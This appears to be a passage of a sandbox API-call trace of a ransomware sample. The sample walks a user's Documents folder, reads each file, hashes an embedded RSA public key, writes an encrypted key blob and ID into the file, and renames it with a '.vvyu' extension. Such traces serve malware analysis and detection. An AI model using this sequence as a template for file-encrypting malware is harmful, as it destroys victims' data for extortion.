[0195.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.356] WriteFile (in: hFile=0x52c, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x7dfb, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x7dfb, lpOverlapped=0x0) returned 1 [0195.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0195.357] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x7e00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.357] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.359] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.360] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.360] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.360] CloseHandle (hObject=0x52c) returned 1 [0195.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0195.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d2cc80 [0195.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0195.362] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\feMArPT27Tt3Vq0tfRa.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\femarpt27tt3vq0tfra.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\feMArPT27Tt3Vq0tfRa.odp.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\femarpt27tt3vq0tfra.odp.vvyu")) returned 1 [0195.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0195.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.365] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0195.367] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27825110, ftCreationTime.dwHighDateTime=0x1d89968, ftLastAccessTime.dwLowDateTime=0x8c4fc880, ftLastAccessTime.dwHighDateTime=0x1d8a272, ftLastWriteTime.dwLowDateTime=0x8c4fc880, ftLastWriteTime.dwHighDateTime=0x1d8a272, nFileSizeHigh=0x0, nFileSizeLow=0x9422, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Gz- YQUlpeGhm6.odt", cAlternateFileName="GZ-YQU~1.ODT")) returned 1 [0195.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0195.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.367] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\Gz- YQUlpeGhm6.odt") returned=".odt" [0195.367] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\Gz- YQUlpeGhm6.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\gz- yqulpeghm6.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.368] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=37922) returned 1 [0195.368] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.371] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x93fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.371] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.373] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.373] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x9422, lpOverlapped=0x0) returned 1 [0195.374] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.374] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.374] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.374] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea678) returned 1 [0195.376] CryptCreateHash (in: hProv=0x6ea678, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.376] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.376] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.376] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.376] GetLastError () returned 0x0 [0195.376] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.376] CryptReleaseContext (hProv=0x6ea678, dwFlags=0x0) returned 1 [0195.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.376] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.377] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.377] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9420) returned 0x2d49778 [0195.377] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42658 [0195.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0195.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d426a0 [0195.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0195.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0195.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a180 [0195.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a138 [0195.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.378] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a180 [0195.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0195.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a138 [0195.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a0d8 [0195.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0195.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0195.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.382] GetCurrentThreadId () returned 0x264 [0195.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46ab0 [0195.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0195.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.382] GetCurrentThreadId () returned 0x264 [0195.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a180 [0195.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0195.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0195.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a138 [0195.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0f0 [0195.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a198 [0195.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0195.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a168 [0195.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a150 [0195.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1b0 [0195.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a150 [0195.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0195.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0195.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0195.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0d8 [0195.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0195.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) 